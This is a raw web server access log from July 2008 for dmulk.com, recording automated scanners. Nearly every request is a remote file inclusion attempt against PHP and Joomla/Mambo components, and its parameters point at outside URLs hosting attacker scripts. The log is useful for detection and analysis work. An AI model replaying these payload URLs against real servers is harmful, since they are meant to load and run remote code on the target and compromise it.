83.18.242.34 - - [06/Jul/2008:11:10:06 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:10:07 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [06/Jul/2008:11:10:10 -0700] "GET /logs/access_080313.log//index.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:10:13 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [06/Jul/2008:11:10:13 -0700] "GET //index.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 200 5231 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [06/Jul/2008:11:10:13 -0700] "GET /logs//index.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs/access_071230.log//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs/access_071230.log//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs/access_071230.log//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET //start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs/access_071230.log//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET //start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET //start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs/access_071230.log//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET //start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET //start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:28 -0700] "GET /logs/access_071230.log//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:29 -0700] "GET //start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:29 -0700] "GET /logs//start.php?lang=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:11:10:35 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:11:10:35 -0700] "GET /logs/access_080507.log/main.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:11:10:35 -0700] "GET /logs/main.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:11:10:36 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:46 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:10:47 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:11:11:07 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:11:11:08 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:11:11:08 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:11:11:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:11:11:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:11:11:13 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:11:22 -0700] "GET /logs//calendar.php?l=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:11:36 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:11:36 -0700] "GET //calendar.php?l=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:11:37 -0700] "GET //index.php?option=com_custompages&cpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 200 18421 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:11:37 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:12:02 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:12:03 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:12:05 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:12:15 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:12:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 200 50 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
76.76.11.207 - - [06/Jul/2008:11:12:24 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.76.11.207 - - [06/Jul/2008:11:12:24 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:11:12:40 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:11:12:41 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:12:45 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:11:12:56 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:12:56 -0700] "GET /logs/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:12:56 -0700] "GET /logs/index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:12:57 -0700] "GET /index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:12:59 -0700] "GET /index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18373 "-" "libwww-perl/5.69" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:11:13:04 -0700] "GET /logs/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:11:13:07 -0700] "GET /index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.79" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:11:13:16 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:13:18 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:11:13:19 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18573 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:11:13:19 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:11:13:24 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:13:44 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:13:44 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:13:47 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:13:50 -0700] "GET /logs/access_080315.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:13:51 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:14:01 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:14:03 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:14:03 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:14:03 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:11:14:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:11:14:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:11:14:07 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:14:08 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:14:08 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:14:08 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.811" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:11:14:10 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.89.162 - - [06/Jul/2008:11:14:42 -0700] "GET /logs/access_080108.log//index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:14:43 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.89.162 - - [06/Jul/2008:11:14:44 -0700] "GET //index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 200 18425 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.89.162 - - [06/Jul/2008:11:14:44 -0700] "GET /logs//index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:14:45 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:14:48 -0700] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.86 - - [06/Jul/2008:11:14:48 -0700] "GET /logs/access_080108.log//index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:14:50 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.86 - - [06/Jul/2008:11:14:51 -0700] "GET //index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 200 18425 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.86 - - [06/Jul/2008:11:14:51 -0700] "GET /logs//index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:14:51 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:11:15:01 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:11:15:01 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:11:15:01 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:15:16 -0700] "GET /logs/access_080313.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.128.80.11 - - [06/Jul/2008:11:15:16 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.11 - - [06/Jul/2008:11:15:16 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.11 - - [06/Jul/2008:11:15:16 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.11 - - [06/Jul/2008:11:15:16 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:11:15:19 -0700] "GET /logs/access_080326.log/main.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:11:15:27 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.170 - - [06/Jul/2008:11:15:38 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.0" 200 25909 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
207.249.0.39 - - [06/Jul/2008:11:15:40 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.89.162 - - [06/Jul/2008:11:15:57 -0700] "GET //index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 200 18409 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:16:00 -0700] "GET /logs/errors.php?error=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:16:01 -0700] "GET /errors.php?error=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.86 - - [06/Jul/2008:11:16:01 -0700] "GET //index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 200 18425 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:16:11 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:16:11 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:16:11 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:16:24 -0700] "GET /logs/access_080329.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:11:16:26 -0700] "GET /logs/access_080128.log/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
